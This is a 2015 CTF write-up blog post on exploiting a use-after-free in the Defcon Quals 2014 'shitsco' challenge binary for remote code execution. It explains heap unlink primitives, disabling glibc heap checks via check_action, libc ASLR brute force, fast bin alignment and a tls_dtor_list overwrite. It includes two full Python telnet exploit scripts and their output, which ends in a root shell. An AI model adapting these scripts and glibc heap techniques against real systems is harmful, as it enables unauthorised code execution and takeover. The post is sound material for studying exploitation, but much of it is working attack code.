Tuesday, February 24, 2015

Revisiting Defcon CTF Shitsco Use-After-Free Vulnerability - Remote Code Execution

Defcon Quals 2014 Shitsco was an interesting challenge. There were two vulnerability in the binary - strcmp information leak and an use-after-free. Challenge could be solved either of these, but getting an RCE seemed hard. Details of the vulnerability could be found here Defcon Quals 2014 - Gynophage - shitsco - [Use-After-Free Vulnerability]

To recap, the binary uses a doubly linked list to store KEY:VALUE pairs. The HEAD node resides in bss memory whose next pointer is not cleared during linked list operations. So this stray pointer points to some freed memory in heap, leading to use-after-free. This is what the structure looks like
struct node
{
    char *key;
    char *value;
    struct node *next;
    struct node *prev;
};
Exploit Primitive

[*] We can reallocate the freed struct node with user controlled data
[*] Information leak could be achieved by setting *key and *value to some static address to read interesting information
[*] This node needs to be deleted, so that further user controlled data could be placed here
[*] Trigger doubly linked list unlink operation

[next+0xc] = prev
[prev+0x8] = next

This gives us a write anything-anywhere primitive, but we have a problem - both next and prev pointers need to be writable. Also NX is enabled, so jumping to shellcode in writable area won't work
[*] Once unlink is done, free(key) and free(value) is called. key and value points to some static address like bss, these pointers do not belong to heap and not suitable for free operation. Glibc sanity checks will immediately abort the program execution and prevent any exploitation
[*] We need information leak and unlink as two separate operation, so that program won't crash after information leak

Problem

[*] Problem of both next and prev pointers being writable could be overcome by overwriting tls_dtor_list. Thanks to Google Project Zero for The poisoned NUL byte, 2014 edition
[*] The free being called with invalid pointers immediately after unlink operation is still a problem. This needs a bypass

I have 2 working solutions for this problem - Disabling glibc heap protection or by triggering an information leak and freeing the same chunk without crashing the program

Disabling glibc protection by overwriting check_action

Interestingly glibc provides features to control program behavior during a heap corruption. This could be passed as environment variable or set using mallopt(). Below is from the man page
The following numeric values are meaningful for M_CHECK_ACTION:

                   0  Ignore error conditions; continue execution (with
                      undefined results).

                   1  Print a detailed error message and continue execution.

                   2  Abort the program.

                   3  Print detailed error message, stack trace, and memory
                      mappings, and abort the program.

                   5  Print a simple error message and continue execution.

                   7  Print simple error message, stack trace, and memory
                      mappings, and abort the program.

              Since glibc 2.3.4, the default value for the M_CHECK_ACTION
              parameter is 3.  In glibc version 2.3.3 and earlier, the
              default value is 1.

The remaining bits in value are ignored.
malloc/malloc.c

# ifndef DEFAULT_CHECK_ACTION
# define DEFAULT_CHECK_ACTION 3
# endif

static int check_action = DEFAULT_CHECK_ACTION;

int __libc_mallopt (int param_number, int value)
{
.....
case M_CHECK_ACTION:
      LIBC_PROBE (memory_mallopt_check_action, 2, value, check_action);
      check_action = value;
      break;
.....
}
This gets called from malloc/arena.c

if (s && s[0])
    {
      __libc_mallopt (M_CHECK_ACTION, (int) (s[0] - '0'));
      if (check_action != 0)
        __malloc_check_init ();
    }

where s[0] is the value passed as MALLOC_CHECK_ environment variable.
So basically ptmalloc_init () sets up all these. check_action being a static variable resides at fixed offset from libc base address. If we could overwrite the check_action variable with some value which won't abort the program, we are good. This could be achieved even by an arbitrary NUL write.

Our target program provides an arbitrary write operation before the invalid free operations. So the idea here is to overwrite the check_action with an valid writable address[ Remember, both next and prev pointer should be valid writable address]. Remaining bits in check_action are ignored.

Libc ASLR bypass

But we still don't know where the check_action resides during execution except for the offset and information leak is not useful for first unlink operation. Since its an 32 bit ELF, libc randomization is limited to 8 bits. So one can brute force this value even over network. Heap has better randomization [greater than 12 bits].
renorobert@ubuntu:~$ ldd ./shitsco | grep libc
 libc.so.6 => /lib/i386-linux-gnu/libc.so.6 (0xf751e000)
 libc.so.6 => /lib/i386-linux-gnu/libc.so.6 (0xf75e7000)
 libc.so.6 => /lib/i386-linux-gnu/libc.so.6 (0xf75f4000)
 libc.so.6 => /lib/i386-linux-gnu/libc.so.6 (0xf75c6000)
 libc.so.6 => /lib/i386-linux-gnu/libc.so.6 (0xf75b5000)
 libc.so.6 => /lib/i386-linux-gnu/libc.so.6 (0xf751a000)
Since the program is not forked, we will choose a libc base address for our exploit and wait until we get lucky.

Exploitation

To exploit this binary we setup the following list
HEAD NODE      UAF CHUNK

[ KEY   ]       |--->[ KEY   ] --> bss address of some fixed string eg. 'set'
[ VALUE ]       |    [ VALUE ] --> bss address of head node for info leak
[ NEXT  ] ------|    [ NEXT  ] --> valid writable address, such that last 3 bits are 0 
[ PREV  ]            [ PREV  ] --> check_action - 8
The reallocation of freed chunk was done by trial and error, by setting and unsetting values. We have better control of this in 2nd solution
Operation supported:

Welcome to Shitsco Internet Operating System (IOS)
For a command list, enter ?
$ ?
==========Available Commands==========
|enable                               |
|ping                                 |
|tracert                              |
|?                                    |
|shell                                |
|set                                  |
|show                                 |
|credits                              |
|quit                                 |
======================================
Type ? followed by a command for more detailed information

$ show set
$ set set
The 'show set' will trigger information leak and 'set set' will unlink the node and disable sanity checks.

Since the chunk is unlinked and freed, we reallocate the same with user controlled data. This time we unlink the node to overwrite the tls_dtor_list with address of fake dtor_list setup in heap[We already have information leak] to call system('/bin/sh').
HEAD NODE      UAF CHUNK

[ KEY   ]       |--->[ KEY   ] --> bss address of some fixed string eg. 'set'
[ VALUE ]       |    [ VALUE ] --> something here
[ NEXT  ] ------|    [ NEXT  ] --> fake dtor_list structure address 
[ PREV  ]            [ PREV  ] --> tls_dtor_list address - 8
Below is the full exploit:
#!/usr/bin/env python

import struct
import telnetlib
from sys import exit
import time

ip = '127.0.0.1'
port = 31337
port = 513

def p(num): return struct.pack("<I", num)

def send(command):
    global con
    con.write(command + chr(0xa))
    return con.read_until('$ ')

# pointer to string set, to be used as key in fake structure
set_string = 0x08049B08
# pointer to sh string -> /bin/sh 
sh_string = 0x080483BD 
# writable address from bss
fake_struct = 0x0804C3C0 
# head node of doubly linked list, to be used for info leak
bss_head_node = 0x0804C36C 
# MALLOC_CHECK_ offset to be added with libc base address
check_action_offset = 0x1AB10C
# tls_dtor_list offset to be subtracted from libc base address
tls_dtor_list_offset = 0x6EC
# offset to system()
system_offset = 0x00040190
# libc_base_address needs to be bruteforced
libc_base_address = 0xf75e1000

print "[*] Bruteforcing libc base address"
while True:
    try:
        con = telnetlib.Telnet(ip, port)
        con.read_until('$ ')
        malloc_check_action = libc_base_address + check_action_offset

        # fake structure for leaking heap memory and disable glibc heap protection
        fakeobj  = p(set_string)
        fakeobj += p(bss_head_node)
        fakeobj += p(fake_struct)
        fakeobj += p(malloc_check_action - 8)

        send('set AAAAAAAAAAAAAAA0 AAAAAAAAAAAAAAAA')
        send('set AAAAAAAAAAAAAAA1 AAAAAAAAAAAAAAAA')
        send('set AAAAAAAAAAAAAAA2 AAAAAAAAAAAAAAAA')
        send('set AAAAAAAAAAAAAAA3 AAAAAAAAAAAAAAAA')
        send('set AAAAAAAAAAAAAAA0')
        send('set AAAAAAAAAAAAAAA0 AAAAAAAAAAAAAAAA')
        send('set AAAAAAAAAAAAAAA1')
        send('set AAAAAAAAAAAAAAA3')
        send('set CCCCCCCCCCCCCCCC ' + fakeobj)

        # trigger information leak
        laddress = send('show set')
        laddress = laddress[5:-3]
        heapa, heapb, heapc = struct.unpack("<III", laddress)
        print "[*] Leaked heap addresses : [0x%x] [0x%x] [0x%x]" %(heapa, heapb, heapc)

        # free allocated memory and overwrite check_option 
        print "[*] Trying check_action overwrite"
        ret = send('set set')
        if '$' not in ret: continue
        print "[*] Overwritten check_action to disable sanity checks"
 
        # address of fake dtor_list
        dtor_list_address = heapa + 0xa8

        # fake object to be used for overwriting tls_dtor_list
        fakeobj  = p(set_string)
        fakeobj += p(set_string)
        fakeobj += p(dtor_list_address)
        fakeobj += p(libc_base_address - tls_dtor_list_offset - 8)

        # fake dtor_list
        dtor_list  = p(libc_base_address + system_offset) # system
        dtor_list += p(sh_string)    # sh
        dtor_list += p(0xdeadbeef)
        dtor_list += p(0xdeadbeef)

        send('set AAAAAAAAAAAAAAA0')
        send('set AAAAAAAAAAAAAAA1 AAAAAAAAAAAAAAAA')
        send('set AAAAAAAAAAAAAAA1')
        send('set ' + dtor_list + ' ' + fakeobj)

        # overwrite tls_dtor_list
        print "[*] Overwriting tls_dtor_list"
        send('set set')

        # get shell
        print "[*] Getting shell"
        con.write('quit\n')
        try: con.interact()
        except: exit(0)
    except: continue
We will get shell when right libc address is hit.
[*] Leaked heap addresses : [0x826f060] [0x826f030] [0x826f078]
[*] Trying check_action overwrite
[*] Leaked heap addresses : [0x927a060] [0x927a030] [0x927a078]
[*] Trying check_action overwrite
[*] Leaked heap addresses : [0x88ce060] [0x88ce030] [0x88ce078]
[*] Trying check_action overwrite
[*] Leaked heap addresses : [0x9504060] [0x9504030] [0x9504078]
[*] Trying check_action overwrite
[*] Leaked heap addresses : [0x9e81060] [0x9e81030] [0x9e81078]
[*] Trying check_action overwrite
[*] Overwritten check_action to disable sanity checks
[*] Overwriting tls_dtor_list
[*] Getting shell
id
uid=0(root) gid=0(root) groups=0(root)
Triggering information leak by Fast bin alignment

This is the second solution for the challenge which doesn't require brute force or check_action overwrite. We rely only on info leaks and some heap operations. The binary allocates heap chunks in 2 sizes - 16 and 24 bytes. Since the KEY:VALUE string is also restricted to 16 bytes.
gdb-peda$ run

 oooooooo8 oooo        o88    o8                                       
888         888ooooo   oooo o888oo  oooooooo8    ooooooo     ooooooo   
 888oooooo  888   888   888  888   888ooooooo  888     888 888     888 
        888 888   888   888  888           888 888         888     888 
o88oooo888 o888o o888o o888o  888o 88oooooo88    88ooo888    88ooo88   
                                                                       
Welcome to Shitsco Internet Operating System (IOS)
For a command list, enter ?
$ set A AAAAAAAAAAAAAAAA
$ set B BBBBBBBBBBBBBBBB
$ ^C

gdb-peda$ python import heap
gdb-peda$ heap used
Used chunks of memory on heap
-----------------------------
     0: 0x0804d008 -> 0x0804d01f       24 bytes uncategorized::24 bytes |28 d0 04 08 30 d0 04 08 00 00 00 00 65 00 00 00 00 00 00 07 11 00 00 00 00 00 00 00 00 00 00 00 |(...0.......e...................|
     1: 0x0804d020 -> 0x0804d02f       16 bytes uncategorized::16 bytes |00 00 00 00 00 00 00 00 00 00 00 09 19 00 00 00 00 00 00 00 42 42 42 42 42 42 42 42 42 42 42 42 |....................BBBBBBBBBBBB|
     2: 0x0804d030 -> 0x0804d047       24 bytes uncategorized::24 bytes |00 00 00 00 42 42 42 42 42 42 42 42 42 42 42 42 00 60 ff 02 11 00 00 00 41 00 92 00 00 00 00 00 |....BBBBBBBBBBBB. ......A.......|
     3: 0x0804d048 -> 0x0804d057       16 bytes uncategorized::16 bytes |41 00 92 00 00 00 00 00 a0 d0 04 09 19 00 00 00 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 |A...............AAAAAAAAAAAAAAAA|
     4: 0x0804d058 -> 0x0804d06f       24 bytes   C:string data:None |41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 00 90 00 02 19 00 00 00 88 d0 04 08 98 d0 04 08 |AAAAAAAAAAAAAAAA................|
     5: 0x0804d070 -> 0x0804d087       24 bytes uncategorized::24 bytes |88 d0 04 08 98 d0 04 08 00 00 00 00 6c c3 04 08 97 00 00 03 11 00 00 00 42 00 8a 00 00 00 00 00 |............l...........B.......|
     6: 0x0804d088 -> 0x0804d097       16 bytes uncategorized::16 bytes |42 00 8a 00 00 00 00 00 00 00 00 09 19 00 00 00 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 |B...............BBBBBBBBBBBBBBBB|
     7: 0x0804d098 -> 0x0804d0af       24 bytes   C:string data:None |42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 00 88 00 02 59 0f 02 00 00 00 00 00 00 00 00 00 |BBBBBBBBBBBBBBBB....Y...........|
User allocations of size 8 goes into fast bin of 16 bytes, and anything above till 16 bytes goes into fast bins of size 24 bytes. doubly-linked list nodes are also part of fast bins of size 24. So in the UAF reallocation, one needs to create allocations in the fast bins list of 24 bytes.

Fast bins have singly-list, the last freed node is inserted as head. On request, it returns a pointer to the first free chunk ie the head. So basically, last freed node is allocated first on request.

Now, the binary requests series of heap chunks like below:

HEAD Node
[*] Head node is in bss. So no heap memory is requested for this chunk
[*] There is 2 strdup calls, to copy user supplied KEY and VALUE into heap. This is used for further processing
[*] Then 2 more strdup calls to setup final pointers for KEY and VALUE for each node
[*] Then first 2 strdup are freed

OTHER Nodes
[*] There is 2 strdup calls, to copy user supplied KEY and VALUE into heap. This is used for further processing
[*] calloc[16 bytes] for struct node
[*] Then 2 more strdup calls to setup final pointers for KEY and VALUE for each node
[*] Then first 2 strdup are freed

Below is ltrace for clarity:
HEAD
[0x8048b68] __strdup(0xffffceb0, 0x8049b08, 3, 0xf7ef9a10)    = 0x804d020
[0x8048b68] __strdup(0xffffceb2, 0x8049b08, 3, 0xf7ef9a10)    = 0x804d030
[0x8049030] __strdup(0x804d020, 17, 0x804c2d8, 0xf7e760ff)    = 0x804d048
[0x804903d] __strdup(0x804d030, 17, 0x804c2d8, 0xf7e760ff)    = 0x804d058
[0x80490ab] free(0x804d020)                                   
[0x80490ab] free(0x804d030)                                   

NEXT
[0x8048b68] __strdup(0xffffceb0, 0x8049b08, 3, 0xf7ef9a10)    = 0x804d020
[0x8048b68] __strdup(0xffffceb2, 0x8049b08, 3, 0xf7ef9a10)    = 0x804d030
[0x8048fcc] calloc(1, 16)                                     = 0x804d070
[0x8048fdc] __strdup(0x804d020, 16, 0x804c2d8, 0xf7e760ff)    = 0x804d088
[0x8048fe6] __strdup(0x804d030, 16, 0x804c2d8, 0xf7e760ff)    = 0x804d098
[0x80490ab] free(0x804d020)                                   
[0x80490ab] free(0x804d030)                                   
So whats the whole plan with these information? We need to modify the fast bin linked list such that both *value and *next pointer of HEAD node points to the same memory ie value for HEAD node should get allocated in the stray next pointer. Right now this is how the HEAD node looks like:
gdb-peda$ x/4wx 0x0804C36C
0x804c36c: 0x0804d048 0x0804d058 0x0804d070 0x00000000

where 0x0804d048 -> key
      0x0804d058 -> value
      0x0804d070 -> next
      0x00000000 -> prev 
This is what we need to achieve:
HEAD NODE      UAF CHUNK

[ KEY   ]    |--|--->[ KEY   ] --> bss address of some fixed string eg. 'set'
[ VALUE ] ---|  |    [ VALUE ] --> bss address of head node for info leak
[ NEXT  ] ------|    [ NEXT  ] --> something here 
[ PREV  ]            [ PREV  ] --> something here

char * value and struct node *next both are pointing to same memory
So what do we achive using this? By using 'show' command, we get information leak since the 'next' pointer will iterate into UAF chunk. The same UAF chunk could be freed by freeing HEAD node, since UAF chunk is a value pointer for HEAD node.

Now, though we dont have valid pointers to be set up in UAF chunk we could free it for further allocation without running into glibc heap checks. Below is a series of operation that could align fast bins [24] as we need:
Series of operation to modify fast bin list of size 24

set A AAAAAAAAAAAAAAAA
[strdup] 0x804d030
[valueA] 0x804d058

set B BBBBBBBBBBBBBBBB
[strdup]  0x804d030
[valueA]  0x804d058  
[allocB]  0x804d070 ; we need to control this memory, this memory should be second last to be freed
[valueB]  0x804d098

set A
[strdup - free] 0x804d030
[freeA]  0x804d058
[allocB]  0x804d070 
[valueB]  0x804d098

set B
[strdup - free] 0x804d030
[freeA]  0x804d058
[freeB2] 0x804d070
[freeB1] 0x804d098

set A AAAAAAAAAAAAAAAA
[strdup] 0x804d070
[valueA] 0x804d098

set A
[strdup - free] 0x804d070
[freeA]  0x804d098

set B BBBBBBBBBBBBBBBB
[strdup] 0x804d098
[valueB] 0x804d070 ; reallocated with BBBBBBBBBBBBBBBB

gdb-peda$ x/4x 0x0804C36C
0x804c36c: 0x0804d080 0x0804d068 0x0804d068 0x00000000
Exploitation

[*] Use the above series of operation to leak heap address
[*] Then use the same for leaking GOT entry of __libc_start_main to find the libc base address
[*] Setup a fake dtor_list to call system('sh')
[*] Setup a fake node with valid heap pointers for free() operation and addresses for tls_dtor_list overwrite
[*] Trigger unlink to overwrite tls_dtor_list and get shell

Below is the exploit
#!/usr/bin/env python

import struct
import telnetlib
from sys import exit

ip = '127.0.0.1'
port = 31337
port = 513

con = telnetlib.Telnet(ip, port)
con.read_until('$ ')

def p(num): return struct.pack("<I", num)

def send(command):
    global con
    con.write(command + chr(0xa))
    return con.read_until('$ ')

# pointer to string set, to be used as key in fake structure
set_string = 0x08049B08
# pointer to sh string -> /bin/sh 
sh_string = 0x080483BD 
# writable address from bss
fake_struct = 0x0804C3C0 
# head node of doubly linked list, to be used for info leak
bss_head_node = 0x0804C36C 
# GOT entry of __libc_start_main, to be used for info leak
libc_start_main = 0x0804C03C
# MALLOC_CHECK_ offset to be added with libc base address
check_action_offset = 0x1AB10C
# tls_dtor_list offset to be subtracted from libc base address
tls_dtor_list_offset = 0x6EC
# libc_start_main offset used to find libc base address
libc_start_main_offset = 0x00019990
# offset to system()
system_offset = 0x00040190


# fake structure for leaking heap memory
fakeobj  = p(set_string)
fakeobj += p(bss_head_node)
fakeobj += p(fake_struct)
fakeobj += p(fake_struct)

send('set A AAAAAAAAAAAAAAAA')
send('set B AAAAAAAAAAAAAAAA')
# will be used as pointers to be freed while overwriting tls_dtor_list
send('set C CCCCCCCCCCCCCCCC')
send('set A')
send('set B')
send('set A AAAAAAAAAAAAAAAA')
send('set A')
# fake object will take the next pointer of head node
send('set B ' + fakeobj)

# trigger info leak to get heap address
laddress = send('show set')
laddress = laddress[5:-3]
heapa, heapb, heapc = struct.unpack("<III", laddress)
print "[*] Leaked heap addresses : [0x%x] [0x%x] [0x%x]" %(heapa, heapb, heapc)

# free the memory
send('set B')

# leak the libc address
fakeobj  = p(set_string)
fakeobj += p(libc_start_main)
fakeobj += p(fake_struct)
fakeobj += p(fake_struct)

send('set A AAAAAAAAAAAAAAAA')
send('set A')
# fake object will take the next pointer of head node
send('set B ' + fakeobj)
# trigger info leak to get libc address
laddress = send('show set')
laddress = laddress[5:5+4]
leaked_libc_start_main = struct.unpack("<I", laddress)[0]

print "[*] Leaked address of __libc_start_main : [0x%x]" %(leaked_libc_start_main)

libc_base_address = leaked_libc_start_main - libc_start_main_offset
print "[*] Address of libc_base_address : [0x%x]" %(libc_base_address)
# check_action overwrite not used for this exploit
print "[*] Address of check_action      : [0x%x]" %(libc_base_address + check_action_offset)

tls_dtor_list_address = libc_base_address - tls_dtor_list_offset
print "[*] Address of tls_dtor_list     : [0x%x]" %(tls_dtor_list_address)

# free the memory
send('set B')

# overwrite tls_dtor_list

# points to C
freea = heapa + 0x40
# points to CCCCCCCCCCCCCCCC
freeb = heapa + 0x50
# points to fake tls_dtor_list with pointer to system('/bin/sh')
fake_tls_dtor_list = heapa - 0x30
# points to fake object
ptr_to_fake_obj = heapa - 0x58

fakeobj  = p(freea)
fakeobj += p(freeb)
fakeobj += p(tls_dtor_list_address - 12)
fakeobj += p(fake_tls_dtor_list)

dtor_list  = p(libc_base_address + system_offset) # system
dtor_list += p(sh_string)    # sh
dtor_list += p(ptr_to_fake_obj) 
dtor_list += p(0xdeadbeef)

send('set ' + dtor_list + ' ' + fakeobj)

# trigger the overwrite
print "[*] Overwriting tls_dtor_list"
send('set C')

# get shell
print "[*] Getting shell"
con.write('quit\n')
try: con.interact()
except: exit(0)
renorobert@ubuntu:~$ python shitsco_sploit.py 
[*] Leaked heap addresses : [0x86b3080] [0x86b3068] [0x86b3068]
[*] Leaked address of __libc_start_main : [0xf751d990]
[*] Address of libc_base_address : [0xf7504000]
[*] Address of check_action      : [0xf76af10c]
[*] Address of tls_dtor_list     : [0xf7503914]
[*] Overwriting tls_dtor_list
[*] Getting shell
id
uid=0(root) gid=0(root) groups=0(root)
So we got two working exploits - One by check_action overwrite and another by triggering information leak by aligning heap chunks based on fast bin operation.